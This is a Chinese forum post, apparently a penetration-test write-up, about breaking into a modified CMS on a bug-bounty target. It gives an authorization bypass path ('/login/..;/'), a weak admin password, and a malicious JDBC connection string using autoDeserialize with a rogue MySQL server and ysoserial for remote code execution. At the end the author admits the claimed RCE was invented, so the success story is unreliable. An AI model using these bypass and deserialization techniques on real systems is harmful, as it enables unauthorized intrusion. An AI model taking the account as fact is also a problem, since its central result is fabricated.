前些天在乌云看一下通用系统的洞,然后fofa查了一下打开第一个居然是某src。
事情好像有点意思了,日他。

但是这个系统被他魔改过加了验证码,前端也加密了,老洞肯定没有。

登录框大概长这样,看了一下有shiro但是打不了。

试了下权限绕过发现/login/..;/ 能直接进去

但是看不到任何数据,点系统参数配置这个功能发现404

去看了下同cms的站,发现直接访问index.jsp,也可以进去(但是src那个站进不去不知道被咋改过)
发现这个功能跳到/adminLogin.jsp 然后弱口令admin123进去了

当时直接把这个登录的包拿到src的那个站去试了一下发现他只是把jsp删了实际上功能还在
然后就直接进到了系统参数配置这里

大概长这样,有一个测试连接的功能,点了一下抓包,包结构如下

可以控制mysql连接地址,于是想到mysql服务端读客户端文件。
将mysql连接地址改为恶意mysql服务端地址发包,好像不行

然后又想到mysql jdbc反序列化,以前没搞过,在github找到一个项目。
https://github.com/fnmsd/MySQL_Fake_Server
然后这边还需要一个ysoserial.jar我这边使用的 https://github.com/zema1/ysoserial
可以直接打回显,看了下上面那个项目的README感觉有点麻烦,于是直接把

这部分写死,返回jdbc连接字符串地方写

url=jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&useUnicode=true&characterEncoding=utf-8&username=yso_urldns_http//www.baidu.com/&password=123456

服务器这边开启恶意mysql服务端,发包。


成功RCE
好吧上面都是我瞎写的,实际上那个src站点因为我之前测试的时候快下班了就忘记搞了,后面想起来去搞结果已经关站了。

点击收藏 | 2 关注 | 1
登录 后跟帖